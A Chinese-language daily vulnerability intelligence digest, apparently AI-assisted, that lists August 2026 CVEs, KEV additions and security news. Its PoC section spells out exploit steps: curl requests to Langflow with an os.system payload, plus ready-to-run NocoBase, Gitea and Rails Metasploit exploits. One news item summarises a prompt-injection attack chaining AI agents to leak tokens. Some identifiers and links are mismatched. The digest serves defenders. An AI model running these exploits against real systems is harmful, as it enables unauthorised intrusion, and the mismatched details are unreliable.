ARTICLE DETAIL

资讯详情

深耕编程入门与网站建设的一线实战洞察。

每日安全情报报告 · 2026-08-05

每日安全情报报告 · 2026-08-05 # 每日安全情报报告 · 2026-08-05 **由 AI 整理发布** 覆盖范围2026-08-03 至 2026-08-05近 24–48 小时新增/在野利用漏洞与情报。 风险标注**【严重】** CVSS ≥ 9.0 **【高危】** 7.0 ≤ CVSS 9.0 **【在野利用】** 已被 CISA KEV 或厂商确认实战利用。 --- ## 一、重点提示Executive Summary - **Adobe Campaign Classic 紧急修复一波零点击、零认证漏洞APSB26-1208/3**CVE-2026-48331SSRF、CVE-2026-48323模板注入、CVE-2026-48330SQLi三项 CVSS 均满分 10.0攻击者无需凭据与交互即可在本地/混合部署的营销服务器上执行任意代码建议立即升级到 build 9399。 - **CISA KEV 8/4 一口气新增 3 项在野漏洞**IBM Langflow 代码注入 **CVE-2026-9198CVSS 9.8**、Apache Tomcat **CVE-2026-34486CVSS 7.5**、N-able N-central **CVE-2026-18556**。其中 Langflow 默认部署即可被未认证者取得 SUPERUSER 并实现完整 RCEBOD 修复截止日 **2026-08-07**。 - **N-able N-central 认证绕过链条已实际攻陷 MSP 客户**CVE-2026-18577 是 CVE-2026-18556 的不完整补丁CISA 8/3 列入 KEVBOD 截止 **2026-08-06**。攻击者在补全补丁前已通过 Take Control Cloudflare 隧道持久化。 - **AI/LLM 基础设施持续成为重灾区**Veeam ONE 代理主机未认证 RCECVE-2026-6463310.0、HashiCorp Terraform MCP Server 跨租户凭据重用CVE-2026-1649810.0、SiYuan 笔记未认证 SQL 注入CVE-2026-690849.9/10.0、NocoBase SQLi→PG 超级用户 RCECVE-2026-5288710.0公开 PoC。 - **公开可利用 PoC 集中爆发**NocoBase CVE-2026-52887、Rails KindaRails2Shell CVE-2026-66066已集成 Metasploit、Langflow CVE-2026-9198 均已有可复现利用请在授权环境中尽快验证与修补。 --- ## 二、最新高危漏洞 ### 2.1 在野利用漏洞CISA KEV 重点标注 | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-9198 | 代码注入未认证 RCE | IBM Langflow OSS 1.0.0–1.10.0 | 9.8 | 【严重】【在野利用】 | [IBM 安全公告](https://www.ibm.com/support/pages/node/7278927) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-9198) | | CVE-2026-18577 | 认证绕过CVE-2026-18556 的不完整补丁 | N-able N-central 2026.3.1.7 | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cveCVE-2026-18577) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18577) | | CVE-2026-18556 | 认证绕过使用备用路径/通道 | N-able N-central | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/kev) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18556) | | CVE-2026-34486 | 加密缺失EncryptInterceptor 绕过 | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 | 7.5 | 【高危】【在野利用】 | [Apache 邮件列表公告](https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-34486) | **在野漏洞修复截止提醒**CVE-2026-18577 的 BOD 26-04 截止日为 **2026-08-06**CVE-2026-9198 / CVE-2026-34486 截止日为 **2026-08-07**联邦及面向公网资产务必优先处置。 ### 2.2 其他严重 / 高危漏洞近 48 小时新增 | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-48330 / CVE-2026-48331 / CVE-2026-48323 | SQL 注入 / SSRF / 模板注入均零交互、零认证 RCE | Adobe Campaign ClassicACCv7.4.3 build 9398 及更早 | 10.0 | 【严重】 | [Adobe APSB26-120](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) [分析报道](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) | | CVE-2026-48326 | SQL 注入需低权限账户 | Adobe Campaign Classic | 9.9 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-48333 / CVE-2026-48317 | 授权缺陷 / eval 注入 | Adobe Campaign Classic | 9.8 / 9.6 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-64633 | 远程未认证代码执行代理主机 | Veeam ONE 13.0.2.6723 及更早 13.x | 10.0v4.0 | 【严重】 | [Veeam KB4892](https://veeam.com/kb4892) [GitHub 公告](https://github.com/advisories/GHSA-xw3v-hx8p-r8v7) | | CVE-2026-69084 | SQL 注入未认证可达匿名 | SiYuan 笔记 ≤ v3.7.2 | 9.9v4.0/ 10.0v3.1 | 【严重】【公开 PoC】 | [GitHub 公告 GHSA-vh22-h7hf-www7](https://github.com/advisories/GHSA-p2x7-4c4p-8wh6) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69084) | | CVE-2026-69085 | SQL 注入/api/filetree/searchDocs | SiYuan 笔记 v3.7.3 | 10.0v3.1/ 9.9v4.0 | 【严重】 | [IONIX 分析](https://www.ionix.io/threat-center/cve-2026-69085) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69085) | | CVE-2026-16498 | 跨租户凭据重用无状态 HTTP 模式 | HashiCorp Terraform MCP Server 0.2.1–1.0.0 | 10.0 | 【严重】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-16498) | | CVE-2026-16496 / CVE-2026-14869 | 授权绕过有状态缓存/ 未认证 SSRF | HashiCorp Terraform MCP Server | 8.9 / 8.6 | 【高危】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) | | CVE-2026-24254 | 越界写多模态服务拓扑 | NVIDIA Dynamo for Linux | 9.8 | 【严重】 | [NVIDIA 产品安全](https://github.com/NVIDIA/product-security/tree/main/2026/5842) [GitHub 公告](https://github.com/advisories/GHSA-4gq3-gh66-qq8g) | | CVE-2026-58048 | 认证用户以数据库 root 执行 SQL越权 | cPanel WHM所有受支持版本/ WP Squared | 9.4v4.0 | 【高危】 | [The Hacker News 报道](https://thehackernews.com/) | | CVE-2026-52887 | SQL 注入 → PostgreSQL 超级用户 RCE | NocoBase ≤ 2.0.60 | 10.0 | 【严重】【公开 PoC】 | [NocoBase 公告 GHSA-p849-8hwh-84j9](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-52887) | | CVE-2026-67192 / CVE-2026-67191 / CVE-2026-67193 | 栈溢出 RCE / 堆溢出 / 信息泄露均预认证 | Xlight FTP Server 3.9.5 | 9.3 / 8.1 / — | 【严重】 | [安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15860) | | CVE-2026-50343 | 本地权限提升Dark Elevator | Windows InstallService微软 7 月补丁已修 | 7.8 | 【高危】【PoC 已公开】 | [利用分析](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15865) | | CVE-2026-66066 | 任意文件读 → RCEKindaRails2Shell | Rails Active Storage7.23.2 / 8.05.1 / 8.13.1需 libvips≥8.13 | 9.5v4.0/ 9.8v3.1 | 【严重】【公开 PoC】 | [Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-66066) | --- ## 三、最新漏洞 PoC含使用步骤 **合规声明**以下 PoC 仅供授权测试与防御研究使用严禁用于未授权目标。 ### 3.1 CVE-2026-9198 — IBM Langflow 未认证 RCE在野 - **来源 / 链接**[Yazoul 技术分析含 PoC 思路](https://www.yazoul.net/advisory/cve/cve-2026-9198-langflow-unauthenticated-rce-exploited-in-wild-poc) [IBM 公告](https://www.ibm.com/support/pages/node/7278927) - **漏洞类型**代码注入CWE-94链式利用 /api/v1/auto_login /api/v1/validate/code - **利用步骤手动复现无需依赖安装** bash # 第 1 步向 auto_login 端点请求获取 SUPERUSER 令牌默认配置下无需任何凭据 curl -X POST http://TARGET:7860/api/v1/auto_login # 第 2 步使用返回的 Bearer 令牌通过 validate/code 端点提交任意 Python 载荷 curl -X POST http://TARGET:7860/api/v1/validate/code \ -H Authorization: Bearer 上一步获取的token \ -H Content-Type: application/json \ -d {code:import os; os.system(\id /tmp/poc.txt\)} - **修复**升级 Langflow OSS 至 **1.10.1**临时缓解——限制网络暴露、在反向代理层封禁上述两个端点、设置 LANGFLOW_AUTO_LOGINfalse。 ### 3.2 CVE-2026-52887 — NocoBase SQLi → PostgreSQL 超级用户 RCE - **来源 / 链接**[公开 PoC 仓库含 exploit.py 与 Docker 实验环境](https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE) [NocoBase 公告](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) - **漏洞类型**SQL 注入CWE-89→ 堆叠语句 → COPY ... TO PROGRAM 系统命令执行 - **依赖**Python 3Docker启动测试环境 - **使用步骤** bash git clone https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE.git cd CVE-2026-52887-NocoBase-SQLi-RCE # 启动漏洞环境默认 auth-basic 允许自助注册故实际可达未认证 docker run -d --name nb-pg --network host \ -e POSTGRES_USERnocobase -e POSTGRES_PASSWORDnocobase -e POSTGRES_DBnocobase postgres:16 docker run -d --name nb-app --network host \ -e DB_DIALECTpostgres -e DB_HOST127.0.0.1 -e DB_PORT5432 \ -e DB_DATABASEnocobase -e DB_USERnocobase -e DB_PASSWORDnocobase \ -e APP_KEYchange-me -e APP_PORT13000 nocobase/nocobase:2.0.57 # 执行 PoC自动注册 登录 触发 COPY TO PROGRAM RCE python3 exploit.py -u http://127.0.0.1:13000 --cmd id /tmp/proof 21 docker exec nb-pg cat /tmp/proof # 验证以 postgres OS 用户执行 - **修复**升级 NocoBase 至 **2.0.61**临时缓解——将数据库用户降权取消 SUPERUSER、在 WAF 层过滤 filter[latestMsgReceiveTimestamp][$lt] 中的非数字字符。 ### 3.3 CVE-2026-66066 — Rails Active Storage KindaRails2Shell 任意文件读 → RCE - **来源 / 链接**[Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) [Ethiack 研究KindaRails2Shell](https://ethiack.com/info-hub/research/kindarails2shell-rails-rce-cve-2026-66066) [Metasploit 模块jburgess-r7](https://github.com/rapid7/metasploit-framework) - **漏洞类型**libvips 未禁用unfuzzed加载器 → 上传构造文件触发变体处理 → 读取 /proc/self/environ含 secret_key_base→ 伪造签名实现 RCE - **使用步骤Metasploit 自动化** bash # 需已安装 Metasploit Framework msfconsole use exploit/multi/http/rails_kindarails2shell set RHOSTS 目标主机 set TARGETURI / set VPS_MIN_VERSION 8.13 # 要求目标 libvips 8.13 run - **修复**升级 Active Storage 至 **7.2.3.2 / 8.0.5.1 / 8.1.3.1**且 libvips ≥ 8.13必须**轮换**所有可能已被读取的密钥secret_key_base、云凭证、数据库凭证临时缓解——设置环境变量 VIPS_BLOCK_UNTRUSTEDtrue 或调用 Vips.block_untrusted(true)。 ### 3.4 CVE-2026-60004 — Gitea 预认证 RCE持续在野附完整 PoC - **来源 / 链接**[公开 PoC 仓库Python仅用标准库](https://github.com/imbas007/CVE-2026-60004-POC) [GitHub 公告](https://github.com/advisories/GHSA-xr9x-r78c-5hrm) - **漏洞类型**diffpatch 端点 Git hook 注入CWE-94CVSS 9.8默认开放注册 - **依赖**Python 3.7无需 pip 安装 - **使用步骤** bash git clone https://github.com/imbas007/CVE-2026-60004-POC.git cd CVE-2026-60004-POC # 全自动化注册 建仓 利用 取回结果 python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd id # 仅检测非侵入 python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check - **修复**升级 Gitea 至已修复版本并关闭不必要的公开注册临时缓解——限制 /api/v1/repos/{owner}/{repo}/diffpatch 端点访问。 --- ## 四、网络安全最新文章 1. **Google 删除 3 个 ADK AI 工作流恶意 GitHub Issue 可触发特权 AgentAgent 间攻击首例** — Pillar Security 演示公开 triage Agent 被提示注入后跨信任边界调用高权限 code-fixing Agent导致 CI runner 代码执行与 bot PAT 泄露。 [阅读原文The Hacker News](https://thehackernews.com/2026/08/google-deletes-3-adk-ai-workflows-after.html) [FreeBuf 中文报道](https://www.freebuf.com/articles/ai-security/493568.html) 2. **cPanel 严重漏洞允许托管客户以数据库 root 执行 SQLCVE-2026-58048** — 认证用户可越过账户边界在数据库 root 上下文执行任意 SQL高危托管环境需尽快打补丁。 [阅读原文The Hacker News](https://thehackernews.com/) 3. **DOUBLECUP 利用 ClickFix 与浏览器缓存 PNG 投递 CountLoader 和 DeviceManager RAT** — 俄罗斯 LaaS将隐写 PNG 植入浏览器缓存以受害人公网 IP 作为解密密钥实现环境锁定DeviceManager 用 EtherHiding区块链解析 C2。 [阅读原文BleepingComputer](https://www.bleepingcomputer.com/news/security/new-doublecup-clickfix-service-hides-malware-in-browser-cache-images/) 4. **CISA 将 N-able N-central 漏洞加入 KEV已有客户被攻陷** — 认证绕过在初次修复后仍被用于入侵 MSP 客户攻击者借 Take Control 与 Cloudflare 隧道持久化。 [阅读原文The Hacker News](https://thehackernews.com/) 5. **N-able攻击者攻陷 N-central 服务器初次修复不完整** — 攻击链细节披露强调 RMM/MSP 平台已成为系统性高危入口。 [阅读原文The Hacker News](https://thehackernews.com/) 6. **Hugging Face Diffusers 三漏洞可绕过 trust_remote_code 执行任意代码FaceHugger** — 自定义管道加载过程中绕过安全护栏AI 供应链风险已修复于 0.38.0。 [阅读原文The Hacker News](https://thehackernews.com/2026/08/hugging-face-diffusers-flaws-could-let.html) 7. **Adobe 紧急修复 Campaign Classic 高危漏洞三个 10 分未授权 RCE** — APSB26-120 修复 SSRF/模板注入/SQLi 等多项零交互漏洞本地与混合部署须升级 build 9399。 [阅读原文HackersRadar](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) 8. **Xlight FTP 服务器曝出三个预认证漏洞最严重可达 RCE** — 影响 3.9.5 之前版本SSH GCM 处理中的栈/堆溢出官方已发布 3.9.5 修复。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15860) 9. **CVE-2026-50343 Dark Elevator Windows 本地提权利用代码公开** — InstallService 逻辑缺陷允许标准用户提升至 SYSTEM无需 UAC 或重启可靠性高。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15865) 10. **HashiCorp Terraform MCP Server 严重漏洞 CVSS 10.0跨租户凭据重用** — AI Agent 集成场景下的隔离失效升级至 1.1.0。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15863) 11. **OpenAI 披露网络犯罪分子如何利用 ChatGPT 运营诈骗行动** — 犯罪网络利用 ChatGPT 创建虚假身份与欺诈网站实施婚恋、投资诈骗并关联强迫劳动。 [阅读原文FreeBuf](https://www.freebuf.com) 12. **CareCloud 数据泄露约 34.5 万患者健康记录、SSN 与财务数据暴露** — AWS 环境在 3 月被未授权访问影响 4.5 万 医疗服务提供者。 [阅读原文Enigma 日报](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 13. **XCSSET v40 卷土重来通过中毒 Xcode 项目攻击 macOS** — 重大重构几乎全内存运行并具备强多态与反检测能力劫持 Chrome 与 Telegram。 [阅读原文Enigma 日报](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 14. **Open WebUI 单批次披露 17 个 CVE** — 含存储型 XSS、同源 XSS 账户接管、SSRF、OAuth 令牌交换接管等高危问题CVE-2026-70492 等。 [查看详情CVE 跟踪](https://cve-dev.imfht.com/detail/CVE-2026-70494) --- *部分内容由 AI 辅助生成*
返回列表